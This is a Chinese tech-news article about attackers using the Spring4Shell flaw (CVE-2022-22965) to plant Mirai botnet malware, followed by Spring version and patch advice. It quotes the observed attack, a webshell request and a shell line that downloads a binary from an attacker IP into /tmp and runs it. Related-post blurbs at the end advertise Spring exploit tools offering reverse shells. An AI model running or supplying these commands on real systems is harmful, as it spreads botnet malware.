漏洞升级?黑客可利用 Spring 框架漏洞部署 Mirai 恶意软件

原创 已于 2022-04-13 08:38:14 修改 · 3.8k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #java #spring #spring boot #业界资讯

于 2022-04-12 08:57:25 首次发布
网络安全服务商TrendMicro报告指出,CVE-2022-22965(SpringShell)漏洞可能被黑客用于在易受攻击的服务器上部署Mirai恶意软件,特别是在新加坡地区。该漏洞允许黑客在设备的“/tmp”文件夹下载并执行Mirai。虽然目前没有实际攻击案例,但存在安全隐患。易受攻击的条件包括使用JDK9及以上版本的Spring框架旧版本,且与Spring-webmvc或spring-webflux相关。建议开发者升级到Spring 5.3.18+或5.2.20+,或者降级到JDK8以降低风险。

整理 | 苏宓

出品 | 优快云(ID:优快云news)

还记得不久之前 Java 圈中惊爆的 Spring 框架漏洞吗?得益很多人使用了 JDK 9 以下的版本、Spring 框架的最新版本,截止目前,并没有真实的应用程序惨遭攻击的事件发生。

但是,据网络安全服务商 Trend Micro 最新发布的报告显示,黑客可利用编号为 CVE-2022-22965(国外网友将其称之为 SpringShell)的漏洞,在设备上部署 Mirai 恶意软件,以此感染易受攻击的物联网设备。Mirai 是一种开源恶意软件,可将路由器和其他网络连接设备变成庞大的僵尸网络。

Trend Micro 的研究人员表示,这一漏洞允许黑客能够在易受攻击的服务器上执行 Mirai 僵尸网络恶意软件,尤其是在新加坡地区。

值得注意的是,基于这一漏洞,黑客可将 Mirai 下载到设备的“/tmp”文件夹,并使用“chmod”更改权限后执行。破解的开发请求和命令如下:

http://{victim IP}:9090/tomcatwar[.]jsp?pwd=j&cmd=cd%20/tmp;%20wget%20http://45[.]95[.]169[.]143/The420smokeplace[.]dns/KKveTTgaAAsecNN
aaaa.x86;chmod%20777%20*;./KKveTTgaAAsecNNaaaa.x86%20mSpring[.]x86


cd /tmp; wget http://45[.]95[.]169[.]143/The420smokeplace.dns/KKveTTgaAAsecNNaaaa.x86;chmod 777 *;./KKveTTgaAAsecNNaaaa.x86 mSpring[.]x86


http://45[.]95[.]169[.]143/The420smokeplace[.]dns/KKveTTgaAAsecNNaaaa.x86

同时,研究人员还发现,恶意软件文件服务器存储了针对不同 CPU 架构的恶意软件的多个变体。不过,其并没有指明具体设备或受感染设备中使用的 CPU 品牌。

494cb9d3e1300124c9d13cc36e48d7f0.png

很多的不定性也为该漏洞埋下了很大的安全隐患。

此前,据 Spring 官方证实,大多数易受攻击的设置或版本都与以下有关:

  • Spring Framework 5.2.20、5.3.18 之前的版本、JDK 9 及以上版本

  • Apache Tomcat

  • Spring-webmvc 或 spring-webflux 依赖项

  • 在 Spring 参数绑定中,使用了非基本参数类型,例如 POJO

  • 可部署、导出为 Web 归档文件(WAR)

安全研究人员称,有黑客之所以能够成功地将该漏洞武器化,是因为他们熟悉暴露的类对象,这也为他们提供了多种途径。譬如,黑客可以访问 AccessLogValve 对象,并将 Apache Tomcat 中的类变量 'class.module.classLoader.resources.context.parent.pipeline.firstpath' 武器化。他们可以通过操纵 AccessLogValve 对象的属性(例如其模式、后缀、目录和前缀),将访问日志重定向到 Web 根目录中,从而做到这一点。”

那么,对于开发者而言,又有哪些防御措施?

目前,使用 Spring 框架漏洞部署 Mirai 恶意软件的过程以及细节并没有被公开,开发者当前所能做的就是从根源减少 Spring 框架漏洞带来的危害。

根据 Spring 官方所发布的公告,开发者们可及时进行不同版本的更新或降级,其中:

  • Apache Tomcat 团队已经发布了 10.0.20、9.0.62 和 8.5.78 版本。

  • 建议开发者、企业升级到 Spring Framework 5.3.18+、5.2.20+ 版本:https://github.com/spring-projects/spring-framework/wiki/Spring-Framework-Versions

  • 最后 Spring 官方指出,降级到 JDK 8 也不失为一种良好的解决方案。

参考:https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html

Spring综合漏洞利用工具
白昼小丑的博客
02-25 1042
工具目前支持Spring Cloud Gateway RCE(CVE-2022-22947)、Spring Cloud Function SpEL RCE (CVE-2022-22963)、Spring Framework RCE (CVE-2022-22965) 的检测以及利用,目前仅为第一个版本,后续会添加更多漏洞POC,以及更多的持久化利用方式。Spring Cloud Gateway RCE(CVE-2022-22947) 目前支持命令执行、一键反弹shell、哥斯拉内存马注入。
Mirai僵尸网络利用Spring4Shell漏洞
Trouvailless的博客
04-22 1330
Mirai僵尸网络变种已经开始利用Spring4Shell漏洞。 3月底,研究人员发现了Spring4Shell 0day 漏洞,随后补丁发布。4月初,Trend Micro安全研究人员发现有攻击者利用Spring4Shell漏洞武器化Mirai 僵尸网络Spring4Shell漏洞概述 Spring框架是一个开源的J2EE应用程序框架,可以帮助软件开发人员快速开发具备企业级特征的Java 应用。近日,安全研究人员在Spring Java框架中发现了2个可以实现远程代码执行的安全漏洞,CVE编号分
Mirai 恶意软件新变种感染 Linux 设备,以期构建 DDoS 僵尸网络
m0_60571990的博客
02-25 1419
Mirai 恶意软件新变种感染 Linux 设备,以期构建 DDoS 僵尸网络
Mirai--恶意软件
02-10
未来回购 用于放置包版本信息。 如何在此仓库被列出 包必须遵守AGPLv3协议开源 JAR必须已在Maven Central或JCenter上线(暂定,之后会支持更多途径) 提交Pull Request 仓库链接 主仓库 -GitHub本身 package.json参考格式 { " announcement " : "包公告" , " type " : " core/plugin-jar/plugin-native/plugin-js等" , " channels " : { " stable " : [ " 1.0.0 " ] }, " repo " : { " 1.0.0 " : " https://example.org/org/example/1.0.0/example
“红遍全球”的恶意软件Mirai,你所需要知道的那些事
weixin_33922672的博客
08-02 855
网络安全公司flashpoint对美国断网事件的调查发现,黑客操控感染了恶意软件Mirai的物联网设备发起了DDOS攻击,影响波及Twitter、Reddit等知名网站,强大的攻击流量甚至使域名服务商DYN多地网络服务直接中断。恶意软件Mirai就是此次攻击的罪魁祸首。 让我们随着FreeBuf来简单了解一下Mirai吧! 1 Mirai以物联网设备(...
Mirai恶意软件幕后者落网
mozhe_的博客
10-31 963
Mirai恶意软件的开发者被判处6个月的软禁,并被要求支付860万美元作为对新泽西州罗格斯大学系统发起分布式拒绝服务(DDoS)攻击的赔偿。 22岁的Paras Jha周五在新泽西一家法院被判有罪,此前他承认违反了《计算机欺诈与滥用法案》(CFAA)。除了家庭监禁和支付赔偿之外,Jha的刑期还包括2500小时的社区服务和5年的社会监督。 当局指控他在2014年11月至2016年9月期间对罗格斯...
基于MiraiSpring框架JavaScript-Kotlin混合编程设计源码
10-05
该项目的设计目标是利用Mirai框架的机器人开发能力和Spring框架的后端处理能力,通过JavaScript和Kotlin的混合编程,创造出一个既能处理复杂的后端逻辑,又能提供动态交互前端的高效项目开发模式。 这种设计可以让...
InfectedSlurs 僵尸网络利用零日漏洞传播 Mirai
技术超强的网络安全平台
08-24 936
Akamai SIRT 管理着全球多个蜜罐,以发现哪些威胁正在积极利用我们的客户和整个互联网。2023 年 10 月下旬,我们注意到针对一个很少使用的 TCP 端口的蜜罐活动略有增加。活动开始时小幅爆发,峰值为每天 20 次尝试,然后逐渐减少到平均每天 2 到 3 次,有些日子完全没有尝试。直到 2023 年 11 月 9 日,受影响的设备仍不为人所知。探测频率较低,似乎首先尝试通过 POST 请求进行身份验证,然后在成功后尝试命令注入攻击。调查发现了特定的 HTTP 漏洞利用路径和目标端口。
利用Mirai框架Mirai-Console开发TRPG骰子插件模板 目前集成了大部分的常用指令,并在此基础上实现更多的
08-22
利用Mirai框架Mirai-Console开发TRPG骰子插件模板。目前集成了大部分的常用指令,并在此基础上实现更多的跑团体系优化指令。例如COC7技能详细查询、DND5e技能列表查询、DND5e怪物图鉴等。目前处于测试阶段
基于mirai框架的QQ群新闻机器人设计源码
10-02
该项目的核心是利用mirai框架,这是一个由 Kotlin 编写的开源QQ机器人框架,可以运行在JVM上,支持Java和Kotlin语言开发,非常适合用以开发各种QQ相关的应用和机器人。 该项目包含的Java源代码文件是实现机器人核心...
spring综合性利用工具-SpringBoot-Scan-GUI(二)
SuperherRo的博客
08-14 2160
开源工具 SpringBoot-Scan 的GUI图形化版本
spring相关漏洞利用工具-SpringBootExploit(二)
SuperherRo的博客
08-14 3027
项目是根据LandGrey/SpringBootVulExploit清单编写,目的hvv期间快速利用漏洞、降低漏洞利用门槛。
【红队】Spring漏洞利用工具
Python_0011的博客
03-29 2000
ssp是一个一个用于探测和利用Spring框架中常见漏洞的工具,使用Go语言开发。本项目的POC来自开源项目AabyssZG/SpringBoot-Scan和互联网收集。本项目信息泄露端点取自https://blog.zgsec.cn/archives/129.html该工具支持探测和利用多个Spring框架版本的漏洞,包括:2023 JeeSpringCloud任意文件上传漏洞CVE-2022-22947 Spring Cloud Gateway SpELRCE漏洞
Spring漏洞综合利用工具
Libra1313的博客
02-11 1595
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
Mirai恶意软件源代码分析与网络安全探索
最新发布
weixin_42576186的博客
08-25 971
Mirai恶意软件是一种针对物联网设备的攻击工具,它利用设备的弱密码或已知漏洞进行感染,并将其转换为僵尸网络以执行分布式拒绝服务(DDoS)攻击。Mirai的特点是它的代码开源,这使得它能快速进化并被广泛传播。
探索Linux.Mirai:揭秘开源的恶意软件研究资源
gitblog_00017的博客
06-07 587
探索Linux.Mirai:揭秘开源的恶意软件研究资源 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 linux.mirai 是一个公开泄漏的 Linux 版本 Mirai 源代码库,专为研究和指标(Indicator of Compromise, IoC)开发而设立。这个项目旨在帮助安全研究员和社区成员了解 Mirai 勒索软件的工作原理,并从中开发出检测和防御策略...
Spring Boot Actuator 漏洞利用
isxiaole的博客
04-12 2832
漏洞利用流程如下: 利用详情参考: https://www.freebuf.com/news/others/234266.html
SpringBoot漏洞利用
SuperherRo的博客
11-06 3974
SpringJava EE编程领域的一个轻量级开源框架,而spring boot是基于Sping优化而来的全新java框架 在日常的项目中经常会遇到使用Spring Boot框架的网站,博主对该框架的常见利用方式进行了整理。此文中的漏洞环境均在本地搭建。 本文聚焦于在黑盒角度中如何发现漏洞利用漏洞
用于查找 Spring4Shell 和 Spring Cloud RCE 漏洞的全自动、可靠且准确的扫描程序
A_991128a的博客
02-06 779
免责声明:此文所提供的文章内容,只为工具源码学习内容或人员(人员,网站管理者)对自己所负责的网站、等(包括但不限于)进行检测或维护参考。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

优快云资讯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值